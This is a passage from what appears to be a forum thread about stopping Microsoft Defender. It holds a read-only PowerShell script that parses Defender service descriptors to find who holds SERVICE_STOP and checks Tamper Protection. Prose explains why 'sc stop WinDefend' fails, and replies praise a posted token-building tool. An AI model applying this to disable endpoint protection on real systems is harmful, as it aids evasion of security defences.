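    CC = 'QUERY_CONFIG'; DC = 'CHANGE_CONFIG'; LC = 'QUERY_STATUS'; SW = 'ENUMERATE_DEPENDENTS'
    RP = 'START';        WP = 'STOP';          DT = 'PAUSE_CONTINUE'; LO = 'INTERROGATE'
    CR = 'USER_DEFINED_CONTROL'; SD = 'DELETE'; RC = 'READ_CONTROL'; WD = 'WRITE_DAC'; WO = 'WRITE_OWNER'
    GA = 'GENERIC_ALL'; GR = 'GENERIC_READ'; GW = 'GENERIC_WRITE'; GX = 'GENERIC_EXECUTE'
}
# Two-letter well-known SID aliases that show up in sc sdshow output
$SidAlias = @{
    SY = 'NT AUTHORITY\SYSTEM';        BA = 'BUILTIN\Administrators'; IU = 'NT AUTHORITY\INTERACTIVE'
    SU = 'NT AUTHORITY\SERVICE';       AU = 'NT AUTHORITY\Authenticated Users'; BU = 'BUILTIN\Users'
    LS = 'NT AUTHORITY\LOCAL SERVICE'; NS = 'NT AUTHORITY\NETWORK SERVICE'; WD = 'Everyone'
}

function Resolve-SidString([string]$Sid) {
    if ($SidAlias.ContainsKey($Sid)) { return $SidAlias[$Sid] }
    try {
        # Service SIDs (S-1-5-80-...) resolve to "NT SERVICE\<name>" via LSA
        return (New-Object System.Security.Principal.SecurityIdentifier($Sid)).Translate(
                   [System.Security.Principal.NTAccount]).Value
    } catch {
        return $Sid   # leave unresolvable SIDs raw
    }
}

function ConvertFrom-ServiceSddl([string]$Sddl) {
    # Only the DACL matters here: "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;...;;;BA)S:(...)"
    $m = [regex]::Match($Sddl, 'D:(?<dacl>(?:\([^)]*\))+)')
    if (-not $m.Success) { return @() }
    foreach ($ace in [regex]::Matches($m.Groups['dacl'].Value, '\(([^)]*)\)')) {
        $f = $ace.Groups[1].Value.Split(';')      # type;flags;rights;objguid;inhguid;sid
        if ($f.Count -lt 6) { continue }
        $rights = [regex]::Matches($f[2], '..') | ForEach-Object { $ServiceRights[$_.Value] }
        [pscustomobject]@{
            Type    = $f[0]                        # A = allow, D = deny
            Trustee = Resolve-SidString $f[5]
            Rights  = @($rights)
        }
    }
}

function Get-ServiceStopHolders([string]$Name) {
    # sc.exe, not the "sc" alias (Set-Content). Drivers like WdFilter have descriptors too.
    $sddl = (& sc.exe sdshow $Name 2>$null | Where-Object { $_ -match 'D:\(' }) -join ''
    if (-not $sddl) { return $null }
    ConvertFrom-ServiceSddl $sddl |
        Where-Object { $_.Type -eq 'A' -and ($_.Rights -contains 'STOP' -or $_.Rights -contains 'GENERIC_ALL') } |
        Select-Object -ExpandProperty Trustee
}

foreach ($svc in $DefenderServices) {
    # Get-Service only covers Win32 services, so kernel drivers show no status here
    $state = (Get-Service -Name $svc -ErrorAction SilentlyContinue).Status
    $who   = Get-ServiceStopHolders $svc
    if ($null -eq $who) {
        '{0,-10} {1,-8} (no descriptor or no SERVICE_STOP grants)' -f $svc, $state
        continue
    }
    '{0,-10} {1,-8} SERVICE_STOP held by: {2}' -f $svc, $state, (($who | Sort-Object -Unique) -join ', ')
}

# Tamper Protection is what the thread says has to be off for any stop to stick
Get-MpComputerStatus -ErrorAction SilentlyContinue |
    Select-Object IsTamperProtected, RealTimeProtectionEnabled, AMServiceEnabled
```

Comparing the WinDefend line with the one for an ordinary service (run Get-ServiceStopHolders on, say, Spooler) makes the point concrete: the ordinary service lists BUILTIN\Administrators, WinDefend lists only the NT SERVICE\ virtual accounts, which is exactly why an elevated "sc stop WinDefend" returns access denied even when run as SYSTEM and why the posted tool goes to the trouble of building a token that carries those SIDs.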
I never posted on this forum, despite looking at it a lot, and from a 2017 account. But that's the first time I saw someone really doing the job with excellence, gz. Sadly it is not long-term due to driver signing. You already did too much, but is there a possibility of not requiring a driver?